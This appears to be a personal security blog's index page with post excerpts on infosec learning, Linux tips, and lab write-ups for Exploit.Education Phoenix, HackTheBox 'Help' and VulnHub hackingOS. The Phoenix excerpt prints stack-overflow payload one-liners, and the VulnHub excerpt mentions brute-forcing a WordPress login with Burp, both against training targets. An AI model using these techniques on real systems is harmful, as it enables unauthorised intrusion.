The Big and Dandy "How to get into Infosec" Resources Post 2020

On a daily basis and on all hacking oriented communities, people ask how to start or to get into Infosec. I decided to maintain a post where I collect my ressources regarding (beginner) learning ressources. I am learning towards an infosec position for a while now and I am now a junior pentester at a … Read moreThe Big and Dandy "How to get into Infosec" Resources Post 2020

FiSi Prüfungsvorbereitung

Ich habe mir vorgenommen, meine Prüfungsvorbereitung online zu sammeln, ich denke, ich behandele immer kleine Themen als Post. As usual, sind die Informationen Unvollständig und nur auf meine Bedürfnisse abgestimmt. Aber vll kann es einer gebrauchen. Trying to be IHK compliant. Ressourcen Projektmanagement Wirtschaft

WriteUp: Phoenix Exploit.Education

Writeup for the Phoenix VM from stack-onepython -c ‘print 64*”A”‘ stack-twoexport ExploitEducation=$”cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r” learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:/opt/phoenix/amd64$ python -c ‘print “c”*64+”\x9d\x06@”‘ | ./stack-three Welcome to phoenix/stack-three, brought to you by calling function … Read moreWriteUp: Phoenix Exploit.Education

strace howto

strace -f -p PID returns syscalls of the process PID -eopen filters for open files -econnect filters for open sockets sendto(32, “@\4\0\0\20\0\1\0\0\0\0\0\0\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0″…, 1088, MSG_NOSIGNAL, NULL, 0 a sendto() syscall, the 32 ist a file descriptor, see /proc/PID/fd/ tbc.

Debian Testing: Steam glXChooseVisual failed

I was trying to get steam working on debian testing and i kept getting the glxChooseVisual failed error. After some ducking* i found this thread on the steam forums and thanks to sgtlion i was able to resolve the issue and i can finally get my system up and running again. So if you encounter … Read moreDebian Testing: Steam glXChooseVisual failed

Smart auto complete

It seems that sometimes smart bash completion is turned off by default so second commands and such as in apt install packagename are not auto completed. To activate it, in /etc/bash.bashrc file uncomment the following lines: #if [ -f /etc/bash_completion ]; then # . /etc/bash_completion #fi

Manjaro 18.0.4 auf dem Thinkpad X1 Tablet Gen. 1

Ich wollte mein X1 Tablet schon verkaufen da ich nicht mehr so dringend ein Tablet brauche. Aber vorher habe ich spontan Manjaro darauf gestartet und nun gefällt es mir wieder sehr gut 🙂 So ohne Windows… Manjaro in GIMP auf dem Thinkpad x1 Tablet Live läuft alles vielversprechend gut, Stift, Touchpad und Wifi laufen! Nach … Read moreManjaro 18.0.4 auf dem Thinkpad X1 Tablet Gen. 1

HackTheBox writeup of "Help"

my first writeup for a machine called: Help, $ nmap -Pn –script vuln Starting Nmap 7.70 ( ) at 2019-05-11 13:22 CEST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for … Read moreHackTheBox writeup of "Help"

vulnhub hackingOS writeup,295/ running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip. i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite. nikto revealed some interesting infos: … Read morevulnhub hackingOS writeup